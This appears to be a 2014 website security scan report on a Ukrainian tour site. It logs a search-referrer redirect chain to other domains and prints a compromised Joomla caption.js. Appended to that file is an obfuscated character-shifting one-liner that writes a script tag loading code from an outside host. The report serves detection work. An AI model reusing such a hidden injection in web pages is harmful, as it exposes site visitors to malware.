Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://anex-tour.com.ua/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: anex-tour.com.ua Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 01:41:46 GMT Pragma: no-cache Location: http://web-redirect.ru/?web Server: nginx/1.4.7 Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sun, 31 Aug 2014 01:41:46 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: _cutt_caches_images=1409449306; expires=Mon, 01-Sep-2014 01:41:46 GMT; path=/ Set-Cookie: a0a080ab576f21cca9c817ae206f01f0=thibvgf9n7b1n0rfkbsm0rr6c4; path=/ X-Powered-By: PHP/5.3.3 | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Sun, 31 Aug 2014 03:46:22 GMT Pragma: no-cache Location: http://ugagr.ru/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Sun, 31 Aug 2014 03:46:22 GMT X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://anex-tour.com.ua/ | 200 OK Content-Length: 8810 Content-Type: text/html | clean |
http://anex-tour.com.ua/media/system/js/caption.js | 200 OK Content-Length: 2136 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)

    var JCaption = new Class({
        initialize: function(selector) {
            this.selector = selector;
            var images = $$(selector);
            images.each(function(image){ this.createCaption(image); }, this);
        },
        createCaption: function(element) {
            var caption = document.createTextNode(element.title);
            var container = document.createElement("div");
            var text = document.createElement("p");
            var width = element.getAttribute("width");
            var align = container.setAttribute("style","float:"+align);
            container.style.width = width + "px";
        }
    });
    document.caption = null;
    window.addEvent('load', function() {
        var caption = new JCaption('img.caption')
        document.caption = caption
    });
    <!-- js-tools -->
    y=0;while(y<62)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00lpngpsu.epn/dpn/vb0dmj0tubu/qiq#?=0tdsjqu?'.charCodeAt(y++)-1))
    <!-- /js-tools -->

Antivirus reports:
http://anex-tour.com.ua//www.travelpayouts.com/widgets/f30648468a3cc309ebb4870816a4b3dc.js?v=102/ | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://anex-tour.com.ua/test404page.js | 404 Not Found Content-Length: 294 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=anex-tour.com.ua
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://anex-tour.com.ua/
Result: anex-tour.com.ua is not infected or malware details are not published yet.